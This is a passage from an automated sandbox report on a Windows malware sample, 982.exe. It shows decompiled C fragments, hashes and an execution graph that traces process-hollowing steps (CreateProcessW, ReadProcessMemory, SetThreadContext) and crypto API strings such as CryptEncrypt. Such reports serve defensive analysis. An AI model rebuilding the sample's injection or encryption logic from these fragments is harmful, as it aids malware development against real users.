                  • CreateMutexW.KERNEL32(00000000,00000000,?), ref: 0040C58E
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.296478770.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.296529342.00417000.00000040.00000001.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: CreateMutex_snwprintf
                  • String ID: g8Cw
                  • API String ID: 451050361-3103284439
                  • Opcode ID: e49b4b3da7b435a57b3e4e9c9e5cf4acdb66041148267d6b0e68d6df042f3639
                  • Instruction ID: 36c13beeff52031c9d9f833bd8c6959bb0ee47b01addbbb580c4d20d437467e3
                  • Opcode Fuzzy Hash: e49b4b3da7b435a57b3e4e9c9e5cf4acdb66041148267d6b0e68d6df042f3639
                  • Instruction Fuzzy Hash: F5F0EC717041145BD7146BA96C06BEA376CEB44305F00817EFA09E72D0EE34D91047DD
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 0040C4F5, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31synchronizationUNIQUE
                  Download Yara Rule
                  C-Code - Quality: 68%
                  			E0040C4F5(void* __eflags) {
				short _v132;
				void* _t5;
				void* _t10;

				_t5 = E00401A52(0x4128e0, 0x72fc3a35);
				 *0x4143a4( &_v132, 0x40, _t5,  *0x415488);
				L00401B09(_t5);
				_t10 = CreateMutexW(0, 0,  &_v132);
				 *0x41548c = _t10;
				return 0 | _t10 != 0x00000000;
			}






                  0x0040c509
                  0x0040c51d
                  0x0040c528
                  0x0040c535
                  0x0040c53d
                  0x0040c54d

                  APIs
                  • _snwprintf.NTDLL ref: 0040C51D
                  • CreateMutexW.KERNEL32(00000000,00000000,?), ref: 0040C535
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.296478770.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.296529342.00417000.00000040.00000001.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: CreateMutex_snwprintf
                  • String ID: g8Cw
                  • API String ID: 451050361-3103284439
                  • Opcode ID: 1cf742fb4f74ba7d072dd59c1caf93188d0326523d257606fcc74e63f0729243
                  • Instruction ID: 146b9e719d585fa1db09a36da7744ebe958f35a2f64565dee515f9001fd86055
                  • Opcode Fuzzy Hash: 1cf742fb4f74ba7d072dd59c1caf93188d0326523d257606fcc74e63f0729243
                  • Instruction Fuzzy Hash: 3FF0E5717442149BD700ABA9AC06BEE36ACEB44305F00803EFA09EB2D0EE3498148BDD
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 0040F292, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 29UNIQUE
                  Download Yara Rule
                  C-Code - Quality: 82%
                  			E0040F292() {
				void* _t3;
				void* _t7;
				void* _t10;
				void* _t15;
				void* _t18;
				void* _t19;

				if( *0x415f4c == 0) {
					E0040F227();
				} else {
					E0040F214();
				}
				E00401503(0x416840, 0x104);
				_t3 = E00401A52(0x412bb0, 0x4bf67e71);
				_t19 = _t3;
				 *0x4143a4(0x416840, 0x104, _t19, 0x416a48, 0x416530, _t15, _t18, _t7);
				_t10 = _t19;
				return HeapFree(GetProcessHeap(), 0, _t10);
			}









                  0x0040f299
                  0x0040f2a2
                  0x0040f29b
                  0x0040f29b
                  0x0040f29b
                  0x0040f2b8
                  0x0040f2c7
                  0x0040f2d6
                  0x0040f2db
                  0x0040f2e4
                  0x00401542

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.296478770.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.296529342.00417000.00000040.00000001.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: _snwprintf
                  • String ID: @hA$g8Cw
                  • API String ID: 3988819677-2636106944
                  • Opcode ID: 732ce19849883ad6b6ae5baab8f4a74ee0b3467da4a84f7d802fc72968657f34
                  • Instruction ID: e972b69ea5731f996dd58b1a7c700a453acaa9277561cdf85d49239cb67cc4b6
                  • Opcode Fuzzy Hash: 732ce19849883ad6b6ae5baab8f4a74ee0b3467da4a84f7d802fc72968657f34
                  • Instruction Fuzzy Hash: D4E022203000106BC2207286AC457FB114ACBC2399B2180BFF90AB62D2CA7D8C06C37E
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 0040F227, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25UNIQUE
                  Download Yara Rule
                  C-Code - Quality: 50%
                  			E0040F227() {
				void* _t3;
				void* _t8;
				void* _t10;
				void* _t13;
				void* _t14;

				 *0x414c14(0, 0x1c, 0, 0, 0x416a48, _t10, _t13);
				_t3 = E00401A52(0x412df0, 0x4bf67e71);
				_t14 = _t3;
				 *0x4143a4(0x416a48, 0x104, _t14, 0x416a48, 0x416530);
				_t8 = _t14;
				return HeapFree(GetProcessHeap(), 0, _t8);
			}








                  0x0040f236
                  0x0040f246
                  0x0040f251
                  0x0040f25a
                  0x0040f263
                  0x00401542

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.296478770.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.296529342.00417000.00000040.00000001.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: _snwprintf
                  • String ID: HjA$g8Cw
                  • API String ID: 3988819677-3647325788
                  • Opcode ID: 627380aad95ed75aaa38f20ecc9f6b9bc813d9b0073c6a6a7e394f29e60d905e
                  • Instruction ID: 86e21f4e142f409bbdd5896e6b5cbe9030aa6b7bc5bdc0fcc4a87da7cf4bd144
                  • Opcode Fuzzy Hash: 627380aad95ed75aaa38f20ecc9f6b9bc813d9b0073c6a6a7e394f29e60d905e
                  • Instruction Fuzzy Hash: 9FE0CD717401107BD31062656D09EF7695DDBD1FA1712403EBE0AE71D1E5748C41C27D
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 004010DC, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24fileUNIQUE
                  Download Yara Rule
                  C-Code - Quality: 68%
                  			E004010DC(void* __eflags) {
				short _v524;

				_t12 = E00401A52(0x412000, 0x7b38aa91);
				 *0x4143a4( &_v524, 0x104, _t3, 0x416840);
				L00401B09(_t12);
				return DeleteFileW( &_v524);
			}




                  0x004010f5
                  0x00401109
                  0x00401114
                  0x0040112a

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.296478770.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.296529342.00417000.00000040.00000001.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: DeleteFile_snwprintf
                  • String ID: g8Cw
                  • API String ID: 366827715-3103284439
                  • Opcode ID: dfb5d015bca185a9f7f25c1b73371922ca55bcfad04c171bb90386b752d709f9
                  • Instruction ID: 7ded67d4db3bd44581a8d62ce4f7b27048894e85998f6b6a93392d295cc14779
                  • Opcode Fuzzy Hash: dfb5d015bca185a9f7f25c1b73371922ca55bcfad04c171bb90386b752d709f9
                  • Instruction Fuzzy Hash: E5E0DF31A0031867C711B7649C0AADB3A2C8B00315F0002B6E969A7292EE789A9487DE
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 00402561, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 11memoryUNIQUE
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00402561(signed int _a8, signed int _a12) {

				return RtlAllocateHeap(GetProcessHeap(), 8, _a8 * _a12);
			}



                  0x0040257c

                  APIs
                  • GetProcessHeap.KERNEL32(00000008,?), ref: 0040256E
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00402575
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.296478770.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.296529342.00417000.00000040.00000001.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateProcess
                  • String ID: )Ew
                  • API String ID: 1357844191-1605116870
                  • Opcode ID: db4b5c6fe51ac2aff8aaaddd553206b00f81b8980156135b8fd8a4c4febe71d0
                  • Instruction ID: 7b0aceb4be34622b36046658aba6f4cfe0c30366996fb5ad577a8c43a0e85ff0
                  • Opcode Fuzzy Hash: db4b5c6fe51ac2aff8aaaddd553206b00f81b8980156135b8fd8a4c4febe71d0
                  • Instruction Fuzzy Hash: 98C08C32100308ABCB009FD8ED49DAA77ACFB48A02F00C010BA18CA090DA30F6008BA4
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 004014F2, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 6memoryUNIQUE
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E004014F2(long __ecx) {

				return RtlAllocateHeap(GetProcessHeap(), 8, __ecx);
			}



                  0x00401502

                  APIs
                  • GetProcessHeap.KERNEL32(00000008,004129A0,00401A84,?,00000000,00000104,?,?,0040F0B9), ref: 004014F5
                  • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 004014FC
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.296478770.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.296529342.00417000.00000040.00000001.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateProcess
                  • String ID: )Ew
                  • API String ID: 1357844191-1605116870
                  • Opcode ID: cd1cb1f1fdb807d5aed22dfe4798381ea017b6bab775c43d41554213982bbd3b
                  • Instruction ID: f421614fde833f2996113b85f7123fd9be9ad5eab0a4f509e971bf896a641baa
                  • Opcode Fuzzy Hash: cd1cb1f1fdb807d5aed22dfe4798381ea017b6bab775c43d41554213982bbd3b
                  • Instruction Fuzzy Hash: 72A012B16001009BDE001FA49D0DA553518B740703F00C054710590090ED6422008764
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 0040499D, Relevance: 5.1, APIs: 4, Instructions: 98COMMON
                  Download Yara Rule
                  C-Code - Quality: 95%
                  			E0040499D(intOrPtr* __ecx, signed int _a8) {
				intOrPtr _t68;
				signed int _t80;
				signed int _t83;
				signed int _t84;
				int* _t85;
				void* _t86;

				_t83 = _a8;
				_t85 = __ecx;
				asm("cdq");
				_t80 = 3;
				 *(__ecx + 8) = _t83;
				 *((intOrPtr*)(__ecx)) = 0;
				 *((intOrPtr*)(__ecx + 4)) = 0;
				 *((intOrPtr*)(__ecx + 0xc)) = ((_t83 & 0x00000fff) + 2) / _t80 + 1;
				 *(__ecx + 0x14) = _t83 >> 0x0000000e & 0x00000001;
				asm("cdq");
				 *((intOrPtr*)(__ecx + 0x10)) = ((_t83 >> 0x00000002 & 0x000003ff) + 2) / _t80 + 1;
				_t84 = _t83 & 0x00008000;
				if(_t84 == 0) {
					_t15 = _t85 + 0x29272; // 0x29272
					memset(_t15, 0, 0x10000);
					_t86 = _t86 + 0xc;
				}
				 *((intOrPtr*)(_t85 + 0x44)) = 0;
				_t17 = _t85 + 0x9273; // 0x9273
				 *((intOrPtr*)(_t85 + 0x28)) = _t17;
				_t19 = _t85 + 0x9272; // 0x9272
				 *((intOrPtr*)(_t85 + 0x2c)) = _t19;
				_t21 = _t85 + 0x39272; // 0x39272
				_t68 = _t21;
				 *((intOrPtr*)(_t85 + 0x40)) = 0;
				 *((intOrPtr*)(_t85 + 0x3c)) = 0;
				 *((intOrPtr*)(_t85 + 0x24)) = 0;
				 *((intOrPtr*)(_t85 + 0x20)) = 0;
				 *((intOrPtr*)(_t85 + 0x1c)) = 0;
				 *((intOrPtr*)(_t85 + 0x68)) = 0;
				 *((intOrPtr*)(_t85 + 0x48)) = 0;
				 *((intOrPtr*)(_t85 + 0x64)) = 0;
				 *((intOrPtr*)(_t85 + 0x60)) = 0;
				 *((intOrPtr*)(_t85 + 0x5c)) = 0;
				 *((intOrPtr*)(_t85 + 0x58)) = 0;
				 *((intOrPtr*)(_t85 + 0x38)) = 8;
				 *((intOrPtr*)(_t85 + 0x30)) = _t68;
				 *((intOrPtr*)(_t85 + 0x34)) = _t68;
				 *((intOrPtr*)(_t85 + 0x6c)) = 0;
				 *((intOrPtr*)(_t85 + 0x54)) = 0;
				 *((intOrPtr*)(_t85 + 0x50)) = 0;
				 *((intOrPtr*)(_t85 + 0x4c)) = 0;
				 *((intOrPtr*)(_t85 + 0x18)) = 1;
				 *((intOrPtr*)(_t85 + 0x70)) = 0;
				 *((intOrPtr*)(_t85 + 0x74)) = 0;
				 *((intOrPtr*)(_t85 + 0x78)) = 0;
				 *((intOrPtr*)(_t85 + 0x7c)) = 0;
				 *((intOrPtr*)(_t85 + 0x80)) = 0;
				 *((intOrPtr*)(_t85 + 0x84)) = 0;
				 *((intOrPtr*)(_t85 + 0x88)) = 0;
				 *((intOrPtr*)(_t85 + 0x8c)) = 0;
				if(_t84 == 0) {
					_t49 = _t85 + 0x90; // 0x90
					memset(_t49, 0, 0x8101);
					_t86 = _t86 + 0xc;
				}
				_t50 = _t85 + 0x8192; // 0x8192
				memset(_t50, 0, 0x240);
				_t51 = _t85 + 0x83d2; // 0x83d2
				memset(_t51, 0, 0x40);
				return 0;
			}









                  0x004049a3
                  0x004049a6
                  0x004049b4
                  0x004049b7
                  0x004049ba
                  0x004049be
                  0x004049c0
                  0x004049c3
                  0x004049ce
                  0x004049de
                  0x004049e2
                  0x004049e5
                  0x004049eb
                  0x004049f2
                  0x004049fa
                  0x00404a00
                  0x00404a00
                  0x00404a03
                  0x00404a06
                  0x00404a0c
                  0x00404a0f
                  0x00404a15
                  0x00404a18
                  0x00404a18
                  0x00404a1e
                  0x00404a21
                  0x00404a24
                  0x00404a27
                  0x00404a2a
                  0x00404a2d
                  0x00404a30
                  0x00404a33
                  0x00404a36
                  0x00404a39
                  0x00404a3c
                  0x00404a3f
                  0x00404a46
                  0x00404a49
                  0x00404a4c
                  0x00404a4f
                  0x00404a52
                  0x00404a55
                  0x00404a58
                  0x00404a5f
                  0x00404a62
                  0x00404a65
                  0x00404a68
                  0x00404a6b
                  0x00404a71
                  0x00404a77
                  0x00404a7d
                  0x00404a85
                  0x00404a8c
                  0x00404a94
                  0x00404a9a
                  0x00404a9a
                  0x00404aa2
                  0x00404aaa
                  0x00404ab2
                  0x00404aba
                  0x00404ac9

                  APIs
                  Memory Dump Source
                  • Source File: 00000005.00000002.296478770.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.296529342.00417000.00000040.00000001.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: memset
                  • String ID:
                  • API String ID: 2221118986-0
                  • Opcode ID: 9fc025132572919f3734a29ac81ef1a2200ba00e6701f7d6fd5a461a0fe62915
                  • Instruction ID: 70126d602587bd303643ef6f1a7dad0836f0adfd5b30951eb2e943be6850c986
                  • Opcode Fuzzy Hash: 9fc025132572919f3734a29ac81ef1a2200ba00e6701f7d6fd5a461a0fe62915
                  • Instruction Fuzzy Hash: D141B2B2900B049FD320CF6AD885683FBE8FB48714B84893ED6DEC2A50D775B5448F54
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Analysis Process: 982.exe PID: 3696 Parent PID: 3668 982.exeUNIQUE

                  Execution Graph

                  Execution Coverage:12.4%
                  Dynamic/Decrypted Code Coverage:100%
                  Signature Coverage:10.2%
                  Total number of Nodes:186
                  Total number of Limit Nodes:3

                  Graph

                  execution_graph 3398 3e123f 3399 3e1271 3398->3399 3402 3e093f 3399->3402 3401 3e127d 3405 3e213f GetPEB 3402->3405 3404 3e0d04 3404->3401 3406 3e2169 3405->3406 3406->3404 3450 3e1a8f 3451 3e1ab0 3450->3451 3452 3e093f GetPEB 3451->3452 3453 3e1abc 3452->3453 3454 3e1b9a 3453->3454 3455 3e1ada 3453->3455 3464 3e1fef 3454->3464 3459 3e12bf 3455->3459 3458 3e1b81 3460 3e093f GetPEB 3459->3460 3463 3e135e 3460->3463 3462 3e139f 3462->3458 3463->3462 3467 3e219f GetPEB 3463->3467 3465 3e12bf 2 API calls 3464->3465 3466 3e1ff9 3465->3466 3466->3458 3468 3e21c9 3467->3468 3468->3463 3519 3e15df 3520 3e1600 3519->3520 3521 3e093f GetPEB 3520->3521 3522 3e160c 3521->3522 3523 3e162a 3522->3523 3524 3e16c0 3522->3524 3525 3e12bf 2 API calls 3523->3525 3528 3e1f6f 3524->3528 3527 3e16a7 3525->3527 3529 3e12bf 2 API calls 3528->3529 3530 3e1f79 3529->3530 3530->3527 3543 3e1bcf 3544 3e1bfc 3543->3544 3551 3e1bf2 3543->3551 3545 3e093f GetPEB 3544->3545 3544->3551 3546 3e1c3e 3545->3546 3547 3e1d5c 3546->3547 3548 3e1c5c 3546->3548 3552 3e200f 3547->3552 3549 3e12bf 2 API calls 3548->3549 3549->3551 3553 3e12bf 2 API calls 3552->3553 3554 3e2019 3553->3554 3554->3551 3407 491dc0 3408 491ded 3407->3408 3409 491000 GetPEB 3408->3409 3410 491df9 3409->3410 3411 492ad0 IsWow64Process 3410->3411 3412 491e0f 3411->3412 3413 491ecd 3412->3413 3414 491e17 3412->3414 3418 492610 3413->3418 3416 491980 9 API calls 3414->3416 3417 491ead 3416->3417 3419 491980 9 API calls 3418->3419 3420 49261a 3419->3420 3420->3417 3273 3e0000 3275 3e0005 3273->3275 3278 3e002d 3275->3278 3298 3e0467 GetPEB 3278->3298 3281 3e0467 GetPEB 3282 3e0053 3281->3282 3283 3e0467 GetPEB 3282->3283 3284 3e0061 3283->3284 3285 3e0467 GetPEB 3284->3285 3286 3e006d 3285->3286 3287 3e0467 GetPEB 3286->3287 3288 3e007b 3287->3288 3289 3e0467 GetPEB 3288->3289 3292 3e0089 3289->3292 3290 3e00e6 GetNativeSystemInfo 3291 3e0109 VirtualAlloc 3290->3291 3296 3e0029 3290->3296 3293 3e0135 3291->3293 3292->3290 3292->3296 3294 3e03c3 3293->3294 3295 3e0384 VirtualProtect 3293->3295 3300 491900 3294->3300 3295->3293 3295->3296 3299 3e0045 3298->3299 3299->3281 3301 491932 3300->3301 3306 491000 3301->3306 3303 49193e 3309 491470 3303->3309 3305 49196c ExitProcess 3305->3296 3325 492800 GetPEB 3306->3325 3308 4913c5 3308->3303 3310 491486 3309->3310 3311 491569 CreateProcessW 3310->3311 3312 49159e ReadProcessMemory 3310->3312 3313 491578 3310->3313 3315 49153d 3310->3315 3316 4920a0 10 API calls 3310->3316 3318 492290 10 API calls 3310->3318 3320 491820 SetThreadContext 3310->3320 3322 491858 CloseHandle 3310->3322 3323 491865 CloseHandle 3310->3323 3324 491872 CloseHandle 3310->3324 3327 492150 3310->3327 3338 491ca0 3310->3338 3349 491fd0 3310->3349 3311->3310 3311->3313 3312->3310 3312->3313 3313->3315 3360 4920a0 3313->3360 3316->3310 3318->3310 3320->3310 3320->3313 3322->3310 3323->3310 3324->3310 3326 49282a 3325->3326 3326->3308 3328 492171 3327->3328 3329 491000 GetPEB 3328->3329 3330 49217d 3329->3330 3371 492ad0 3330->3371 3332 492193 3333 49225b 3332->3333 3334 49219b 3332->3334 3335 4926b0 9 API calls 3333->3335 3336 491980 9 API calls 3334->3336 3337 492242 3335->3337 3336->3337 3337->3310 3339 491cc1 3338->3339 3340 491000 GetPEB 3339->3340 3341 491ccd 3340->3341 3342 492ad0 IsWow64Process 3341->3342 3343 491ce3 3342->3343 3344 491ceb 3343->3344 3345 491d81 3343->3345 3377 491980 3344->3377 3374 492630 3345->3374 3348 491d68 3348->3310 3350 491ff1 3349->3350 3351 491000 GetPEB 3350->3351 3352 491ffd 3351->3352 3353 492ad0 IsWow64Process 3352->3353 3354 492013 3353->3354 3355 492063 3354->3355 3356 492017 3354->3356 3392 492670 3355->3392 3357 491980 9 API calls 3356->3357 3359 492058 3357->3359 3359->3310 3361 4920b8 3360->3361 3362 491000 GetPEB 3361->3362 3363 4920c4 3362->3363 3364 492ad0 IsWow64Process 3363->3364 3365 4920da 3364->3365 3366 49212a 3365->3366 3367 4920de 3365->3367 3395 492690 3366->3395 3369 491980 9 API calls 3367->3369 3370 49211f 3369->3370 3370->3315 3372 492adc IsWow64Process 3371->3372 3373 492ae9 3371->3373 3372->3373 3375 491980 9 API calls 3374->3375 3376 49263a 3375->3376 3376->3348 3378 491000 GetPEB 3377->3378 3381 491a1f 3378->3381 3380 491a50 CreateFileW 3380->3381 3383 491a60 3380->3383 3382 491a7f VirtualAlloc 3381->3382 3381->3383 3388 491b89 CloseHandle 3381->3388 3389 491b99 VirtualFree 3381->3389 3390 492860 GetPEB 3381->3390 3382->3383 3384 491aa0 ReadFile 3382->3384 3385 491c8f 3383->3385 3386 491c7e VirtualFree 3383->3386 3384->3383 3387 491ac1 VirtualAlloc 3384->3387 3385->3348 3386->3385 3387->3381 3387->3383 3388->3381 3389->3381 3391 49288a 3390->3391 3391->3380 3393 491980 9 API calls 3392->3393 3394 49267a 3393->3394 3394->3359 3396 491980 9 API calls 3395->3396 3397 49269a 3396->3397 3397->3370 3421 3f09b1 3428 3ee40d 3421->3428 3423 3f09c2 3431 3ef4c3 3423->3431 3425 3f09c7 3426 3f0a5f 3425->3426 3434 3ee18d 3425->3434 3438 3e2c0c GetPEB 3428->3438 3430 3ef4af 3430->3423 3432 3e2c0c GetPEB 3431->3432 3433 3f099d 3432->3433 3433->3425 3436 3ee19b 3434->3436 3435 3ee1e4 3435->3425 3436->3435 3440 3ee0ce 3436->3440 3439 3e2c21 3438->3439 3439->3430 3441 3ee0d9 3440->3441 3444 3ee0df 3440->3444 3441->3444 3445 3edfc1 3441->3445 3443 3ee106 3443->3436 3444->3436 3446 3edfce 3445->3446 3449 3e3743 GetPEB 3446->3449 3448 3ee000 3448->3443 3449->3448

                  Executed Functions

                  Function 004926D0, Relevance: .0, Instructions: 4COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000006.00000002.302698370.00491000.00000020.00000001.sdmp, Offset: 00491000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_491000_982.jbxd
                  Similarity
                  • API ID: CreateFile
                  • String ID:
                  • API String ID: 823142352-0
                  • Opcode ID: f8b49f3466dcbdd5e63a53c087d3b72389dbc28b21cd111d0a4e51603c5f5366
                  • Instruction ID: b0547309981cd7e5451454c14efcab295934e70a4a2ab6a56e376ed63988595f
                  • Opcode Fuzzy Hash: f8b49f3466dcbdd5e63a53c087d3b72389dbc28b21cd111d0a4e51603c5f5366
                  • Instruction Fuzzy Hash: 9D90027D757075120A4577E30652989A84419D0748344406FE002004524A588838DD3A
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Function 00492670, Relevance: .0, Instructions: 4COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 409 492670-49267f call 491980 call 492600
                  Memory Dump Source
                  • Source File: 00000006.00000002.302698370.00491000.00000020.00000001.sdmp, Offset: 00491000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_491000_982.jbxd
                  Similarity
                  • API ID: CreateFile
                  • String ID:
                  • API String ID: 823142352-0
                  • Opcode ID: ab4c8c7f3a2b842a710522aa320b236c56b36bc81bbfa36c8a26bf4290abe6ea
                  • Instruction ID: 6a4c643c7c6cbb9b859e6a436b1b974e2da6e91c60c3ba4dbcfafa462cde048a
                  • Opcode Fuzzy Hash: ab4c8c7f3a2b842a710522aa320b236c56b36bc81bbfa36c8a26bf4290abe6ea
                  • Instruction Fuzzy Hash: 0D9002BAA81421511A4177E30623D899D042B61B48344506FA0810041308491A14D53A
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Function 00492630, Relevance: .0, Instructions: 4COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 404 492630-49263f call 491980 call 492600
                  Memory Dump Source
                  • Source File: 00000006.00000002.302698370.00491000.00000020.00000001.sdmp, Offset: 00491000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_491000_982.jbxd
                  Similarity
                  • API ID: CreateFile
                  • String ID:
                  • API String ID: 823142352-0
                  • Opcode ID: 77813ec1177f64da510f27dc46ca843b65ce5602e39920573ebb61a44d39366a
                  • Instruction ID: 5e82650c6a9ed5c9946a0bc66619120a7d3d2a9a79356ddf9cea7415fd05cdc4
                  • Opcode Fuzzy Hash: 77813ec1177f64da510f27dc46ca843b65ce5602e39920573ebb61a44d39366a
                  • Instruction Fuzzy Hash: 25900279141005522A017FF70526B8958001B58748B88456BA14A4092359580810E83A
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Function 004926B0, Relevance: .0, Instructions: 4COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 419 4926b0-4926bf call 491980 call 492600
                  Memory Dump Source
                  • Source File: 00000006.00000002.302698370.00491000.00000020.00000001.sdmp, Offset: 00491000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_491000_982.jbxd
                  Similarity
                  • API ID: CreateFile
                  • String ID:
                  • API String ID: 823142352-0
                  • Opcode ID: 14b9b3d89ed45de54cd9d34dc8431c11ec78ab6fb982c160575ebb8bab00b8b2
                  • Instruction ID: 2badf0a5007c55508d044f9c2ab04f73481f446baff957defe6bfdf758e2acb7
                  • Opcode Fuzzy Hash: 14b9b3d89ed45de54cd9d34dc8431c11ec78ab6fb982c160575ebb8bab00b8b2
                  • Instruction Fuzzy Hash: 8090027F641005520B0077E32972F8959445964798345406FE0055091359484810E43A
                  Uniqueness

                  Uniqueness Score: 0.00%

                  Function 00470000, Relevance: 144.4, Strings: 115, Instructions: 616UNIQUE
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 0 470000-47000d 1 470015-470017 0->1 2 47000f-470013 0->2 4 470da6-470da9 1->4 2->1 3 47001c-470c58 call 470db0 2->3 12 470c90-470cbd 3->12 13 470c5a-470c6e 3->13 16 470cc6-470cd0 12->16 17 470cbf-470cc1 12->17 13->12 18 470c70-470c87 13->18 19 470ce1-470cea 16->19 17->4 18->12 23 470c89-470c8b 18->23 21 470cec-470d06 19->21 22 470d08-470d1c 19->22 21->19 25 470d2d-470d34 22->25 23->4 26 470d36-470d41 25->26 27 470d43-470d72 25->27 26->25 29 470d76-470d78 27->29 30 470d7e-470d9b 29->30 31 470d7a-470d7c 29->31 33 470da1 30->33 34 470d9d-470d9f 30->34 31->4 33->4 34->4
                  Strings
                  Memory Dump Source
                  • Source File: 00000006.00000002.302663285.00470000.00000040.00000001.sdmp, Offset: 00470000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_470000_982.jbxd
                  Similarity
                  • API ID:
                  • String ID: $ $ $ $!$!$#$$$'$+$-$.$.$1$2$2$3$5$5$5$5$6$6$8$:$<$<$=$>$>$?$A$A$A$B$B$CryptAcquireContextA$CryptEncrypt$CryptImportKey$D$E$H$H$I$J$K$K$L$L$M$N$R$R$R$R$S$S$V$W$W$[$[$[$\$\$`$`$a$advapi32.dll$c$d$e$e$e$e$e$e$g$g$g$h$h$i$i$k$k$n$n$o$p$p$q$q$r$s$s$s$t$t$t$u$u$u$u$u$v$x$x$x$}$}$}$~$~$~
                  • API String ID: 0-3394408708
                  • Opcode ID: 360789facf9acdbb35299756f2f936d2c052fbc7d21058e99c2ecf0cc8d9053c
                  • Instruction ID: 9daf2d2bec60aedefb9846b15a6faaae3990d0e08d8a8757adc2ea97cc9bab7b
                  • Opcode Fuzzy Hash: 360789facf9acdbb35299756f2f936d2c052fbc7d21058e99c2ecf0cc8d9053c
                  • Instruction Fuzzy Hash: F992572090C7D9D9EB32C6788C587DDBEB11B27318F0841D9D1DC2A2D2C7BA1B85CB66
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 00491980, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 239fileUNIQUE
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
